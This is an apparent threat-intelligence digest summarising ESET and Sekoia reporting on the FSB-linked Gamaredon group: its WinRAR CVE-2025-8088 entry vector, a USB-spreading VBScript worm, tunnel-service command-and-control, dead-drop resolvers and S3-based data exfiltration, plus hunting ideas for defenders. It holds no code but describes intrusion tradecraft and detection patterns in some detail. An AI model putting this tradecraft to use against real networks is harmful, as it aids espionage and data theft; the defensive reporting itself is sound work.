ESET Gamaredon 2025 annual paper — tunnels/Workers/dead-drops, S3-compatible exfil, Turla collab

ESET's annual Gamaredon paper documents the FSB-linked group's 2025 toolset — six new PowerShell tools (PteroDee, PteroCache, PteroDum, PteroOdd, PteroEffigy, PteroPaste) plus a resurrected PteroSetup VBScript weaponizer — and, more usefully for defenders elsewhere, a wholesale shift of infrastructure onto trusted services (ESET, 2026-06-25). C2 now rides Cloudflare tunnels (trycloudflare.com), Cloudflare Workers (workers.dev), Microsoft DevTunnels (devtunnels.ms), Loophole, No-IP DDNS, Clever Cloud and Supabase; data is exfiltrated via rclone to S3-compatible object storage (Wasabi, Tebi, and Intercolo — which became the primary destination by December), and hostnames are brokered through dead-drop resolvers spread across Telegram, Telegra.ph, Dropbox, GoFile, Mastodon and a dozen paste services so no fixed IP or domain appears in the implant. ESET also confirms an early-2025 collaboration with Turla. Sekoia independently documented the same 2025 shift toward tunnel-service C2 and S3-compatible cloud-storage exfiltration in its parallel "FSB's Matryoshka" Gamaredon series (Sekoia, 2026-06-04). Targeting stayed exclusively Ukrainian government and military — the report names no EU targets — so the relevance here is the tradecraft, not the victimology.

Why it matters to us: the tunnel-and-cloud-storage model defeats domain/IP blocklists and blends with legitimate egress, and it is exactly the pattern any espionage operator can adopt. Detection concepts: alert on tunnel-service egress (trycloudflare.com / workers.dev / devtunnels.ms) initiated by Office or scripting processes; flag rclone or S3-API PUT/POST from hosts with no backup role; hunt PowerShell that reads paste-site domains and decodes base64 blobs.

Monday 2 June brought Sekoia's part-one Gamaredon series (Sekoia TDR, 2026-06-01), consolidating three capability clusters under unified naming: GammaPhish (the spearphishing-through-GammaLoad funnel), GammaWorm (the USB-and-network-propagation layer), and GammaSteel (the S3-exfiltration stealer confirmed in the same campaign arc via Sekoia TDR follow-up, daily 2026-06-03).

Initial access (GammaPhish): weaponised xHTML files exploiting CVE-2025-8088 (the WinRAR path-traversal flaw, patched but widely unpatched) drop HTA payloads into Windows Startup directories via mshta.exe. Propagation (GammaWorm): a 20,000+-line obfuscated VBScript worm persists via scheduled tasks and Run/RunOnce registry keys, hides components in NTFS Alternate Data Streams, and spreads across USB drives and mapped network shares using Ukrainian-language lures (T1025, T1091). C2 resolves through dead-drop pages on Telegram, Telegra.ph, Teletype.in, Supabase and Cloudflare Workers — all platforms with high allow-list rates at enterprise egress proxies. Exfiltration (GammaSteel): the S3-exfiltration stealer stages and uploads collected data directly to attacker-controlled AWS S3 buckets.

The detection pattern across all three stages is highly transferable to non-Ukraine targets. Hunt for: mshta.exe spawning wscript.exe; large obfuscated VBScripts executing from %APPDATA%; scheduled tasks with randomised GUID names pointing into user-profile paths; NTFS ADS on %TEMP%/%APPDATA% files (dir /r or Sysmon EID 11 for streams); outbound HTTPS to Telegra.ph / Supabase / Workers from non-developer hosts; and anomalous S3-API calls from user endpoints.

Sekoia's first part of the Gamaredon series disclosed a January 2026 campaign arc (Sekoia TDR, 2026-06-01; daily 2026-06-02; update daily 2026-06-03). Initial access via CVE-2025-8088 (WinRAR path-traversal, widely unpatched) drops HTA payloads from xHTML attachments. GammaWorm's NTFS-ADS concealment and USB-propagation pattern is the signature detection challenge: filesystem timestamps are useless (ADS hides the worm content), and the worm spreads to any mounted drive and mapped share, meaning air-gap-adjacent workstations remain in scope. GammaSteel exfiltrates collected data directly to S3. Part two of the Sekoia series is outstanding and expected to detail further tooling. Open question: has the campaign reached any EU public-sector estate beyond its primary Ukrainian targets? The USB-propagation vector is exactly the mechanism Luna Moth used this week for physical office intrusion — conceptually distinct actors, coincidentally parallel technique.

UPDATE (originally covered 2026-06-02): Sekoia TDR's "FSB's Matryoshka" series adds material technical detail to the Gamaredon (UAC-0010 / ACTINIUM) tooling consolidation covered yesterday: the group is exploiting the WinRAR path-traversal flaw CVE-2025-8088 as an initial-access vector, using the traversal to write payloads directly into %APPDATA%\…\Start Menu\Programs\Startup\ for persistence without a Registry or Scheduled-Task artefact (Sekoia TDR, 2026-06-01).

The series also names GammaSteel, a modular file-stealer (consolidating prior QuietSieve/HarvesterX-class modules) that captures files by extension and — newly — exfiltrates to attacker-controlled S3-compatible cloud storage in addition to Gamaredon's previously documented HTTP/Telegram channels (The Hacker News, 2026-06-02). The full chain runs WinRAR archive → GammaPhish (HTA) → GammaLoad (VBScript downloader) → GammaWorm/GammaSteel.

Delta for defenders: CVE-2025-8088 is fixed in WinRAR 7.13 (August 2025), so the entry vector is closed by patching — inventory WinRAR versions across the estate. Hunt for archive utilities writing executables or .vbs into Programs\Startup paths (Sysmon EID 11 on target path containing Programs\Startup), WinRAR spawning wscript.exe/mshta.exe, and VBScript processes making outbound requests to S3 endpoints inconsistent with normal business traffic. The targeting is Ukraine-centric, but the WinRAR vector reaches any organisation that opens archive-format lures.

Sekoia's Threat Detection & Research team published part one of a Gamaredon (UAC-0010 / ACTINIUM, attributed to Russia's FSB) series describing a January 2026 campaign against Ukrainian government and military targets, introducing unified naming for two capability clusters: GammaPhish (the funnel from spearphishing through GammaLoad deployment) and GammaWorm (the propagation layer, subsuming the tooling previously tracked as LitterDrifter / PteroLNK) (Sekoia TDR, 2026-06-01 · Infosecurity Magazine, 2026-06-01). The chain begins with weaponised xHTML files exploiting CVE-2025-8088 (the WinRAR path-traversal flaw) to drop HTA payloads into Windows Startup directories via mshta.exe. GammaWorm itself is a 20,000+-line obfuscated VBScript worm that persists via scheduled tasks and RunOnce/Run registry keys, hides components in NTFS Alternate Data Streams, propagates across USB and mapped network drives using Ukrainian-language lures, and resolves C2 through dead-drop resolvers on Telegram, Telegra.ph, Teletype.in, Supabase and Cloudflare Workers.

Why it matters to us: The ADS-hiding + removable-media propagation + legitimate-service dead-drop pattern is highly transferable to any EU public-sector estate. Hunt for mshta.exe spawning wscript.exe, large obfuscated VBScripts executing from %APPDATA%, scheduled tasks with randomised GUID names pointing into user-profile paths, ADS on %TEMP%/%APPDATA% files, and outbound HTTPS to Telegra.ph / Supabase / Workers endpoints from non-developer hosts.